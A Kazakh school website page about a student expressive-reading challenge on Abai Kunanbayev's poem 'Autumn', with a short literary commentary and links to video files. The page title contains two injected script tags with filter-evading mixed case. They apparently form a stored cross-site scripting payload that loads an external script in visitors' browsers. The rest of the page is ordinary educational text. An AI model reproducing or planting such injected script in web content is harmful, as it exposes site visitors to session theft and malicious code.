Абай Құнанбаев "Күз"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
14.11.2021
Абай Құнанбаев "Күз"
Мәнерлеп оқу
6-7 сыныптар ұйымдастырған челлендж.
Абай бұл өлеңінде жылдың төрт мезгілін суреттейтін басқа өлеңдер індегідей үлкен ақындық шеберлік таныта отырып, табиғат көріністеріне жанастыра ауылдың күнделікті машықты өмір тұрмысын барынша қарапайым нақтылы түрде, ешқандай көріктемей, әдейі әсірелеусіз сипаттайды. Аспанды қаптаған сұр бұлтты, жерді басқан дымқыл тұманды, жапырағы түскен ағашты, сарғайып тозған күзеуді суреттеу арқылы көшпелі ауыл тіршілік ететін табиғи ортаны, айналаны нақтылы қалпында айқын көзге елестетеді. Ойнақтаған жылқылар, үйірінен қашып, оқшауланған биелер, жарыса шапқылаған тайлар - бұлар да мал баққан елдің өмір-тұрмысының айнымас, әрқашанда қосақтасып жүретін белгі-нышандары десек болады. Өлеңді түгелдей алып қарасақ, онда табиғат көріністерінен гөрі көшпелі елдің өмір-тұрмысын, тіршілік әрекетін бейнелеу жағы басымырақ екенін кереміз.
/public/files/2021/11/14/141121_154223_2435946221106562014298429037289104413656607n.mp4
/public/files/2021/11/14/141121_154245_2480757145822517928885275914368923333065179n.mp4
/public/files/2021/11/14/141121_154303_2551412614893212088964519089317231468795475n.mp4
/public/files/2021/11/14/141121_154323_2555925514238054091011284662471525139664529n.mp4
/public/files/2021/11/14/141121_154350_25631549359850175149863040193069942221369n.mp4
/public/files/2021/11/14/141121_154408_2565254732859764300427735047840725480347318n.mp4
Просмотров: 362